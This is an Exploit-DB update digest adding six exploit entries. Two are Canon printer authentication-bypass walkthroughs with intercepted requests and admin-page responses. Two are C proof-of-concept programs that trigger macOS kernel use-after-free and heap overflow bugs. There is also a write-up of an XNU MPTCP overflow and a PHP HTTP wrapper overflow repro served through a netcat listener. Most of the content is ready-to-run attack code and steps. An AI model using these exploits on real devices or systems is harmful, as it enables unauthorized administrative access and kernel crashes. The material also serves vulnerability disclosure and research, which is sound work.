DB: 2018-06-07

6 changes to exploits/shellcodes

PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow
macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver
macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist
XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP
Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass
Canon MF210/MF220 - Authenticaton Bypass

exploits/hardware/webapps/44844.txt

@@ -0,0 +1,184 @@
+# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C]
+# Date: [3.6.2018]
+# Exploit Author: [Huy Kha]
+# Vendor Homepage: [http://global.canon.com]
+# Software Link: [ Website ]
+# Severity: High
+# Version: LBP6650, LBP3370, LBP3460, LBP7750C
+# Tested on: Mozilla FireFox
+
+# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers.
+It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication.
+
+
+
+# PoC :
+Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers.
+You can recognize them with the /tlogin.cgi parameter, but the version is
+also been displayed on the webinterface.
+https://imgur.com/a/QE3GfLw
+
+# Example :
+
+1. Go to the following url: http://127.0.0.1/tlogin.cgi
+2. Click on Administrator Mode
+3. Intercept now the request with Burpsuite and click on 'Ok'' to login.
+And forward the request till you get the ''/frame.cgi?page=DevStatus''
+parameter.
+
+
+# Request :
+
+GET /frame.cgi?page=DevStatus HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/tlogin.cgi
+Cookie: CookieID=1610705327:; Login=11
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# Response :
+
+HTTP/1.1 200 OK
+Date: MON, 05 JAN 1970 16:35:57 GMT
+Server: CANON HTTP Server
+Content-Type: text/html
+Content-Length: 5652
+
+<html>
+
+<head>
+<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
+<meta http-equiv="pragma" content="no-cache"/>
+<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0"/>
+<meta http-equiv="expires" content="Thu 01 Jan 1970 00:00:00 GMT"/>
+
+
+
+<script language="JavaScript">
+document.write('<title>Remote UI <');
+switch("DevStatus")
+{
+case "DevStatus":document.write('Status');break;
+case "DevError":document.write('Error Information');break;
+case "DevUtil":document.write('Utility Menu');break;
+case "DevCtrl":document.write('Device Control');break;
+case "DevCalib":document.write('Calibration');break;
+case "DevInfo":document.write('Device Information');break;
+case "DevInfoSetDev":document.write('Change Device Information');break;
+case "DevInfoSetSecu":document.write('Change Administrator Settings');break;
+case "DevInfoSetIpSecu":document.write('Change IP Address Range');break;
+case "DevInfoSetIpv6Secu":document.write('Change IP Address Range');break;
+case "DevInfoSetMacSecu":document.write('Change Receiving Permitted MAC
+Address');break;
+case "DevInfoSetRuiSecu":document.write('Change Remote UI Setting');break;
+case "KeyManageSet":document.write('Key and Certificate');break;
+case "KeyManageDetail":document.write('Certificate Details');break;
+case "KeyManageNewKey":document.write('Generate Key and Certificate');break;
+case "KeyManageNewCert":document.write('#&Title_KeyManageNewCert');break;
+case "KeyManageKeyInst":document.write('Install Key and Certificate');break;
+case "KeyManageKeyPasswd":document.write('Enter Private Key
+Password');break;
+case "CaManageSet":document.write('CA Certificate');break;
+case "CaManageDetail":document.write('Certificate Details');break;
+case "CaManageKeyInst":document.write('Install CA Certificate');break;
+case "JobHistory":document.write('Job Log Display');break;
+case "DevFeature":document.write('Features');break;
+case "DevNetwork":document.write('Network');break;
+case "DevNetworkSetTcpip":document.write('Change TCP/IP Settings');break;
+case "DevNetworkSetNetware":document.write('Change NetWare Settings');break;
+case "DevNetworkSetApTalk":document.write('Change AppleTalk
+Settings');break;
+case "DevNetworkSetSMB":document.write('Change SMB Protocol
+Settings');break;
+case "DevNetworkSetNetIF":document.write('Change Ethernet Driver
+Setting');break;
+case "DevNetworkSetSNMP":document.write('Change SNMP Settings');break;
+case "DevNetworkSetSNMPV3User":document.write('User Settings');break;
+case "DevNetworkSetSNMPV3ConText":document.write('Context Settings');break;
+case "DevNetworkSetSNMPV3ConTextSet":document.write('Context
+Settings');break;
+case "DevNetworkSetSpool":document.write('Change Spooler Setting');break;
+case "DevNetworkSetNWakeUp":document.write('Change Startup Time');break;
+case "DevNetworkParList":document.write('Parameter List');break;
+case "DevNetworkFactDef":document.write('Initialize Network
+Settings');break;
+case "DevNetworkSetEmail":document.write('Change E-mail Print
+Settings');break;
+case "EmailRecv":document.write('Receive E-mails');break;
+case "DevIDControl":document.write('Department ID Management');break;
+case "DevIDSetting":document.write('Department ID Management');break;
+case "DevIDRegist":document.write('Department ID Management');break;
+case "DevIDEdit":document.write('Department ID Management');break;
+case "DevCount":document.write('Counter Check');break;
+case "JobPrtProp":document.write('Print Job Details');break;
+case "JobPrtSecure":document.write('Unlock');break;
+case "JobStore":document.write('Stored Job');break;
+case "JobStoreList":document.write('#&Title_JobStoreList');break;
+case "JobStoreEnterPwd":document.write('Enter Password');break;
+case "JobStoreProp":document.write('Stored Job Details');break;
+case "JobStoreExec":document.write('Print Stored Job');break;
+case "JobStoreBoxProp":document.write('Change Box Settings');break;
+case "JobLog":document.write('Print Log');break;
+case "EmailLog":document.write('E-mail Receive Log');break;
+case "PdfPrint":document.write('Direct Print');break;
+case "PsPrint":document.write('Direct Print');break;
+case "ImgPrint":document.write('Direct Print');break;
+case "CfgCtrl":document.write('Control Menu');break;
+case "CfgCtrlSet":document.write('Change Control');break;
+case "CfgCtrlTimeSet":document.write('Change Date and Time');break;
+case "CfgPaper":document.write('Paper Source Menu');break;
+case "CfgPaperSet":document.write('Change Paper Source');break;
+case "CfgLayout":document.write('Layout Menu');break;
+case "CfgLayoutSet":document.write('Change Layout');break;
+case "CfgQuality":document.write('Quality Menu');break;
+case "CfgQualitySet":document.write('Change Quality');break;
+case "CfgUserMainte":document.write('User Maintenance Menu');break;
+case "CfgUserMainteSet":document.write('Change User Maintenance');break;
+case "CfgExpCard":document.write('Extension Card');break;
+case "SupLink":document.write('Support Links');break;
+case "SupLinkSet":document.write('Edit Support Links');break;
+case "Debug":document.write('Debug');break;
+case "Syslog":document.write('System Log');break;
+default:document.write('');break;
+}
+document.write('> : LBP6650 ; LBP6650</title>');
+
+var url = new String(document.location);
+var ssl = "0";
+if( ssl == '1')
+{
+    if(url.match("https") == null )
+    {
+document.location.href = "blank.html";
+    }
+}
+
+</script>
+
+</head>
+
+<frameset cols="185,*" frameborder="NO" border="0" framespacing="0" >
+<frame src="/menu.cgi?Type=DEVICE" marginwidth="8" marginheight="0"
+name="Index" noresize scrolling="NO">
+<frame src="/dstatus.cgi" name="Body">
+</frameset>
+<noframes>
+<body>
+</body>
+</noframes>
+
+</html>
+
+
+
+# Do we have now access to the printer with Admin Mode? : Yes
+
+# How to fix this? : Remove the default password and add a new (strong) password.
+
+
+# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode)

exploits/hardware/webapps/44845.txt

@@ -0,0 +1,323 @@
+# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]
+# Date: [4.6.2018]
+# Exploit Author: [Huy Kha]
+# Vendor Homepage: [http://global.canon.com]
+# Software Link: [ Website ]
+# Version: MF210 & MF20 Series
+# Severity: High
+# Tested on: Mozilla FireFox
+# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface.
+It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.
+
+
+
+# PoC :
+Start searching for Canon MF210 & MF220 printers.
+You can recognize them with the /login.html parameter, but the version is
+also been displayed on the webinterface.
+https://imgur.com/a/5ON4HF6
+
+# Example :
+
+1. Go to the following url: http://127.0.0.1/login.html
+2. Click on System Manager Mode
+3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter.
+
+
+# Request :
+
+GET /portal_top.html HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
+Firefox/52.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://129.2.52.116/login.html
+Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+# Response :
+
+HTTP/1.1 200 OK
+Expires: Thu, 1 Jan 1998 00:00:00 GMT
+Content-Type: text/html
+Content-Length: 6119
+Pragma: no-cache
+Cache-Control: no-store, no-cache, max-age=0
+Connection: close
+Set-Cookie:
+fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
+http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml" >
+<head>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<meta http-equiv="content-script-type" content="text/javascript" />
+<meta http-equiv="content-style-type" content="text/css" />
+<meta http-equiv="pragma" content="no-cache" />
+<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />
+<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />
+<meta http-equiv="X-UA-Compatible" content="IE=7" />
+<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />
+<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />
+<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />
+<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />
+<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />
+<script type="text/javascript" src="js/rui.js"></script>
+<script language="javascript">
+function unloadFunc(e) { }
+registEvent(window, "unload", unloadFunc);
+</script>
+<title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title>
+</head>
+<body>
+<div id="container">
+<div id="ruiPotalSet">
+<div class="Wrapper">
+<div id="portalBranding">
+<h1 id="deviceLogo">
+<a href="portal_top.html">
+
+<img src="media/branding_logo_imageCLASS.png" />
+
+</a>
+</h1>
+<div id="productInformation">
+<table>
+<caption></caption>
+<colgroup>
+<col class="ItemNameColumn" />
+<col class="ItemValueColumn" />
+</colgroup>
+<tbody>
+<tr>
+<th>Device Name:</th>
+<td>MF220&nbsp;Series </td>
+</tr>
+<tr>
+<th>Product Name:</th>
+<td>MF220 Series </td>
+</tr>
+<tr>
+<th>Location:</th>
+<td> </td>
+</tr>
+</tbody>
+</table>
+</div>
+</div>
+<div id="commonTools">
+<fieldset id="authTools">
+
+<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>
+</fieldset>
+</div>
+</div>
+<hr />
+</div>
+<div id="applications">
+<div id="portalApplicationBranding">
+<div class="Wrapper">
+<h1 id="applicationLogo"><img src="media/app_icon.png" /><span
+class="BrandingName">Remote UI: Portal</span></h1>
+<div id="appTools">
+<a href="mailto:"><span class="Name">Mail to System Manager</span></a>
+</div>
+</div>
+</div>
+<hr />
+<div id="applicationContents">
+<div class="Wrapper">
+<div id="contentsWrapper">
+<div id="contents">
+<div id="contentHeading_potal">
+<h2 class="PageName">Device Info</h2>
+<div id="contentHeadingTools">
+<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>
+<div id="tmpReload">
+<a href="javascript:location.reload()"><img src="media/bh_updt.gif"
+alt="Update" title="Update" /></a>
+</div>
+</div>
+</div>
+<hr />
+<h2>Contents</h2>
+<div id="quotationModule">
+<div class="QuotationModuleHeading"><h3></h3></div>
+<div class="QuotationModuleElement">
+<div id="deviceBasicInformation" class="ContentModule">
+<div class="ModuleHeading"><h4>Device Basic Information</h4></div>
+<div id="deviceStatusModule" class="ModuleElement">
+<h5>Device Status</h5>
+<table class="PropertyListComponent">
+<colgroup>
+<col class="ItemNameColumn" />
+<col class="ItemValueColum" />
+</colgroup>
+<tbody>
+<tr>
+<th>Printer:</th>
+<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
+<span class="StatusMessage">Sleep mode.</span>
+</td>
+</tr>
+<tr>
+<th>Scanner:</th>
+<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
+<span class="StatusMessage">Sleep mode.</span>
+</td>
+</tr>
+
+<tr>
+<th>Fax:</th>
+<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>
+<span class="StatusMessage">Ready to send or receive faxes.</span>
+</td>
+</tr>
+
+</tbody>
+</table>
+</div>
+<div id="deviceErrorInfoModule" class="ModuleElement">
+<h5>Error Information</h5>
+<p>No errors.</p>
+
+</div>
+</div>
+<div id="MaintenanceInfomationModule" class="ContentModule">
+<div class="ModuleHeading"><h4>Consumables Information</h4></div>
+<div id="paperInfomationModule" class="ModuleElement">
+<input type="button" class="ButtonEnable" value="Check Consumables Details"
+onclick="location.href='consumables_check.html'"/>
+<h5>Paper Information</h5>
+<table summary="Paper Source, Remaining Paper, Paper Size">
+<colgroup>
+<col class="PaperSourceColumn" />
+<col class="RemainColumn" />
+<col class="PaperSizeColumn" />
+<col class="PaperTypeColumn" />
+</colgroup>
+<thead>
+<tr>
+<th>Paper Source</th>
+<th>Paper Level</th>
+<th>Paper Size</th>
+<th>Paper Type</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<th>Multi-Purpose Tray</th>
+<td>None</td>
+
+<td>LTR</td>
+
+<td>Plain (16 lb Bond-23 lb Bond)</td>
+</tr>
+<tr>
+<th>Drawer 1</th>
+<td>OK</td>
+
+<td>LTR</td>
+
+<td>Plain (16 lb Bond-23 lb Bond)</td>
+</tr>
+</tbody>
+</table>
+</div>
+<div id="tonerInfomationModule" class="ModuleElement">
+<h5>Cartridge Information</h5>
+<table>
+<colgroup>
+<col class="ItemNameColumn" />
+<col class="ItemValueColumn" />
+</colgroup>
+<thead>
+<tr>
+<th>Color</th>
+<th>Level</th>
+</tr>
+</thead>
+<tbody>
+<tr>
+<th>Black</th>
+<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>
+</tr>
+</tbody>
+</table>
+</div>
+</div>
+<div id="linkInformationModule" class="ContentModule">
+<div class="ModuleHeading"><h4>Support Link</h4></div>
+<div class="ModuleElement">
+<table class="PropertyListComponent">
+<colgroup>
+<col class="ItemNameColumn" />
+<col class="ItemValueColumn" />
+</colgroup>
+<tbody>
+<tr>
+<th>Support Link:</th>
+
+<td></td>
+
+</tr>
+</tbody>
+</table>
+</div>
+</div>
+</div>
+</div>
+</div>
+</div>
+<hr />
+<div id="navigationWrapper">
+<div id="navigation">
+<h2>menu</h2>
+<div id="navStandard">
+<h3 class="GroupTitle">Standard Tool</h3>
+<ul>
+<li class="Main">
+<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status
+Monitor/Cancel</span></a>
+</li>
+<li class="Main">
+<a href="p_paper.html" class="Standby UsermodeMain"><span
+class="Name">Settings/Registration</span></a>
+</li>
+</ul>
+</div>
+
+<div id="navGeneral">
+<ul>
+<li class="Main">
+<a href="a_addresslistone.html" class="Standby AddressMain">
+<span class="Name">Address Book</span></a>
+</li>
+</ul>
+</div>
+
+</div>
+</div>
+</div>
+</div>
+</div>
+<hr />
+<div id="applicationInfo">
+<address class="SiteInforLegal">Copyright CANON INC. 2014</address>
+</div>
+</div>
+</div>
+</body>
+</html>
+
+
+
+# Do we have now access to the printer with System Manager Mode? : Yes
+
+# Screenshot : https://imgur.com/a/U6oBYNV
+
+# How to fix this? : Remove the default password and add a new (strong) password.

exploits/macos/dos/44847.c

@@ -0,0 +1,147 @@
+/*
+nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
+
+It calls task_deallocate without locking. Two threads can race calling this external method to drop
+two task references when only one is held.
+
+Note that the repro forks a child which give the nvAccelerator a different task otherwise
+the repro is more likely to leak task references than panic.
+*/
+
+// ianbeer
+
+#if 0
+MacOS kernel UAF due to lack of locking in nvidia GeForce driver
+
+nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService.
+
+It calls task_deallocate without locking. Two threads can race calling this external method to drop
+two task references when only one is held.
+
+Note that the repro forks a child which give the nvAccelerator a different task otherwise
+the repro is more likely to leak task references than panic.
+#endif
+
+// build: clang -o nvtask nvtask.c -framework IOKit
+// run: while true; do ./nvtask; done
+
+#include <stdint.h>
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <unistd.h>
+
+#include <pthread.h>
+
+#include <mach/mach.h>
+#include <mach/vm_map.h>
+
+#include <IOKit/IOKitLib.h>
+
+uint64_t set_app_support_bits(mach_port_t conn) {
+  kern_return_t err;
+  
+  uint64_t inputScalar[16];  
+  uint64_t inputScalarCnt = 0;
+
+  char inputStruct[4096];
+  size_t inputStructCnt = 0;
+
+  uint64_t outputScalar[16];
+  uint32_t outputScalarCnt = 0;
+
+  char outputStruct[4096];
+  size_t outputStructCnt = 0;
+
+  inputStructCnt = 1;
+  outputStructCnt = 1;
+
+  inputStruct[0] = 0xff;
+
+  err = IOConnectCallMethod(
+   conn,
+   0x107,
+   inputScalar,
+   inputScalarCnt,
+   inputStruct,
+   inputStructCnt,
+   outputScalar,
+   &outputScalarCnt,
+   outputStruct,
+   &outputStructCnt); 
+
+  if (err != KERN_SUCCESS){
+   printf("IOConnectCall error: %x\n", err);
+  } else{
+    printf("worked?\n");
+  }
+  
+  return 0;
+}
+
+
+volatile int go = 0;
+volatile int running = 0;
+void* thread_func(void* arg) {
+  mach_port_t conn = (mach_port_t)arg;
+  printf("thread running\n");
+  running = 1;
+  while(!go){;}
+  set_app_support_bits(conn);
+  return 0;
+}
+
+int main(int argc, char** argv){
+  pid_t child_pid = fork();
+  if (child_pid == -1) {
+    printf("fork failed\n");
+    return 0;
+  }
+  if (child_pid) {
+    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
+    if (service == MACH_PORT_NULL) {
+      printf("unable to find service\n");
+      return 0;
+    }
+    printf("got service: 0x%x\n", service);
+
+    io_connect_t conn = MACH_PORT_NULL;
+    kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
+    if (err != KERN_SUCCESS) {
+      printf("unable to open ioservice\n");
+      return 0;
+    }
+    printf("got service\n");
+    pthread_t th;
+    pthread_create(&th, NULL, thread_func, (void*)conn);
+
+    while(!running){;}
+    go = 1;
+    set_app_support_bits(conn);
+
+    pthread_join(th, NULL);
+
+    int loc = 0;
+    wait(&loc);
+  } else {
+    io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator"));
+    if (service == MACH_PORT_NULL) {
+      printf("unable to find service\n");
+      return 0;
+    }
+    printf("got service: 0x%x\n", service);
+
+    io_connect_t conn = MACH_PORT_NULL;
+    kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice
+    if (err != KERN_SUCCESS) {
+      printf("unable to open ioservice\n");
+      return 0;
+    }
+    printf("got service\n");
+    set_app_support_bits(conn);
+    
+  }
+
+  return 0;
+}

exploits/multiple/dos/44848.c

@@ -0,0 +1,105 @@
+/*
+getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.
+
+When allocating a kernel buffer to serialize the attr list to there's the following comment:
+
+  /*
+   * Allocate a target buffer for attribute results.
+   * Note that since we won't ever copy out more than the caller requested,
+   * we never need to allocate more than they offer.
+   */
+  ab.allocated = ulmin(bufferSize, fixedsize + varsize);
+  if (ab.allocated > ATTR_MAX_BUFFER) {
+    error = ENOMEM;
+    VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
+    goto out;
+  }
+  MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);
+
+The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
+is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:
+
+  /* Return attribute set output if requested. */
+  if (return_valid) {
+    ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
+    if (pack_invalid) {
+      /* Only report the attributes that are valid */
+      ab.actual.commonattr &= ab.valid.commonattr;
+      ab.actual.volattr &= ab.valid.volattr;
+    }
+    bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
+  }
+
+There's no check that the allocated buffer is big enough to hold at least that.
+
+Tested on MacOS 10.13.4 (17E199)
+*/
+
+// ianbeer
+#if 0
+MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist
+
+getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall.
+
+When allocating a kernel buffer to serialize the attr list to there's the following comment:
+
+	/*
+	 * Allocate a target buffer for attribute results.
+	 * Note that since we won't ever copy out more than the caller requested,
+	 * we never need to allocate more than they offer.
+	 */
+	ab.allocated = ulmin(bufferSize, fixedsize + varsize);
+	if (ab.allocated > ATTR_MAX_BUFFER) {
+		error = ENOMEM;
+		VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
+		goto out;
+	}
+	MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);
+
+The problem is that the code doesn't then correctly handle the case when the user supplied buffer size
+is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:
+
+	/* Return attribute set output if requested. */
+	if (return_valid) {
+		ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS;
+		if (pack_invalid) {
+			/* Only report the attributes that are valid */
+			ab.actual.commonattr &= ab.valid.commonattr;
+			ab.actual.volattr &= ab.valid.volattr;
+		}
+		bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual));
+	}
+
+There's no check that the allocated buffer is big enough to hold at least that.
+
+Tested on MacOS 10.13.4 (17E199)
+
+#endif
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/attr.h>
+
+int main() {
+  int fd = open("/", O_RDONLY);
+  if (fd == -1) {
+    perror("unable to open fs root\n");
+    return 0;
+  }
+
+  struct attrlist al = {0};
+
+  al.bitmapcount = ATTR_BIT_MAP_COUNT;
+  al.volattr = 0xfff;
+  al.commonattr = ATTR_CMN_RETURNED_ATTRS;
+
+  size_t attrBufSize = 16;
+  void* attrBuf = malloc(attrBufSize);
+  int options = 0;
+
+  int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options);
+  printf("err: %d\n", err);
+  return 0;
+}

exploits/multiple/dos/44849.txt

@@ -0,0 +1,78 @@
+mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family.
+
+The logic of this function fails to correctly handle source and destination sockaddrs which aren't
+AF_INET or AF_INET6:
+
+// verify sa_len for AF_INET:
+
+  if (dst->sa_family == AF_INET &&
+      dst->sa_len != sizeof(mpte->__mpte_dst_v4)) {
+    mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__,
+        dst->sa_len),
+       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
+    error = EINVAL;
+    goto out;
+  }
+
+// verify sa_len for AF_INET6:
+
+  if (dst->sa_family == AF_INET6 &&
+      dst->sa_len != sizeof(mpte->__mpte_dst_v6)) {
+    mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__,
+        dst->sa_len),
+       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
+    error = EINVAL;
+    goto out;
+  }
+
+// code doesn't bail if sa_family was neither AF_INET nor AF_INET6
+
+  if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) {
+    if (mptcp_entitlement_check(mp_so) < 0) {
+      error = EPERM;
+      goto out;
+    }
+
+    mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED;
+  }
+
+// memcpy with sa_len up to 255:
+
+  if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) {
+    memcpy(&mpte->mpte_dst, dst, dst->sa_len);
+  }
+
+This PoC triggers the issue to overwrite the mpte_itfinfo field leading to a controlled pointer
+being passed to kfree when the socket is closed.
+
+Please note that these lengths seem to be trusted in multiple places - I would strongly suggest auditing
+this code quite thoroughly, especially as mptcp can be reached from more places as of iOS 11.
+
+Note that the MPTCP code does seem to be quite buggy; trying to get a nice PoC working for this buffer overflow
+bug I accidentally triggered the following error path:
+
+  error = socreate_internal(dom, so, SOCK_STREAM, IPPROTO_TCP, p,
+          SOCF_ASYNC, PROC_NULL);
+  mpte_lock(mpte);
+  if (error) {
+    mptcplog((LOG_ERR, "%s: subflow socreate mp_so 0x%llx unable to create subflow socket error %d\n",
+        (u_int64_t)VM_KERNEL_ADDRPERM(mp_so), error),
+       MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR);
+
+    proc_rele(p);
+
+    mptcp_subflow_free(mpts);
+    return (error);
+  }
+
+note that first argument to mptcplog has one too few arguments. It's probably not so interesting from a security
+POV but is indicative of untested code (this error path has clearly never run as it will always kernel panic.) 
+
+This PoC is for MacOS but note that this code is reachable on iOS 11 from inside the app sandbox if you give yourself
+the multipath entitlement (which app store apps can now use.)
+
+Just run this PoC as root on MacOS for easy repro.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44849.zip

exploits/php/dos/44846.txt

@@ -0,0 +1,108 @@
+Description:
+------------
+The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:
+
+php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
+
+			if (tmp_line[tmp_line_len - 1] == '\n') {
+				--tmp_line_len;
+				if (tmp_line[tmp_line_len - 1] == '\r') {
+					--tmp_line_len;
+				}
+}
+
+If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed.
+
+$ bin/php --version
+PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS )
+Copyright (c) 1997-2018 The PHP Group
+Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies
+
+
+Test script:
+---------------
+$ xxd -g 1 poc
+0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a        000000000100..
+
+$ nc -vvlp 8080 < poc
+Listening on [0.0.0.0] (family 0, port 8080)
+Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083)
+GET / HTTP/1.0
+Host: localhost:8080
+Connection: close
+
+$ bin/php -r 'file_get_contents("http://localhost:8080");'
+
+Expected result:
+----------------
+NO CRASH
+
+Actual result:
+--------------
+$ bin/php -r 'file_get_contents("http://localhost:8080");'
+=================================================================
+==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac
+READ of size 1 at 0xbfc038ef thread T0
+    #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
+    #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979
+    #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027
+    #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550
+    #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224
+    #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573
+    #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731
+    #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760
+    #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082
+    #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123
+    #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134
+    #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042
+    #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404
+    #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82)
+    #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0)
+Address 0xbfc038ef is located at offset 607 in frame <php_stream_url_wrap_http_ex> of T0's stack:
+  This frame has 13 object(s):
+    [32, 36) 'transport_string'
+    [96, 100) 'errstr'
+    [160, 164) 'http_header_line_length'
+    [224, 232) 'timeout'
+    [288, 296) 'req_buf'
+    [352, 360) 'tmpstr'
+    [416, 432) 'ssl_proxy_peer_name'
+    [480, 496) 'http_header'
+    [544, 576) 'buf'
+    [608, 736) 'tmp_line'
+    [768, 1792) 'location'
+    [1824, 2848) 'new_path'
+    [2880, 3904) 'loc_path'
+HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
+      (longjmp and C++ exceptions *are* supported)
